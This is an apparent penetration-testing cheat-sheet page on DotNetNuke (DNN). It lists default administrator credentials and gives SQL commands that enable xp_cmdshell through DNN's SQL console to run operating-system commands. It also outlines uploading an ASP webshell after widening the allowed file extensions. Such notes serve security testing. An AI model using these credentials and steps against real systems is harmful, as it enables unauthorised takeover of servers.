DNN

Default Creds

$ creds search DotNetNuke
+------------------------+----------+----------+
| Product                | username | password |
+------------------------+----------+----------+
| dotnetnuke corporation |  admin   | dnnadmin |
| dotnetnuke corporation |   host   | dnnhost  |
+------------------------+----------+----------+

RCE

SQL Console

System command can be run via the built-in SQL console under the Settings menu.

# enable xp_cmdshell
EXEC sp_configure 'show advanced options', '1'
RECONFIGURE
EXEC sp_configure 'xp_cmdshell', '1' 
RECONFIGURE

After pressing Run Script OS commands can be executed.

ASP Webshell

If the SuperUser account is compromised, we can access the Security settings (Figure 1) and allow any file extensions needed so we can upload a webshell (Figure 2).

Figure 1: Accessing the Security settings.
Figure 2: Add the desired file extensions.

Upload a webshell, such as this .asp webshell (Figure 3).

Figure 3: Uploiad the webshell.

Get the file's URL by right-clicking and interact with the webshell.

Figure 4: Get the URL and interact with the webshell.

Resources

https://www.dnnsoftware.com/www.dnnsoftware.com
PreviousCuteNewsNexteXtplorer

Last updated

Was this helpful?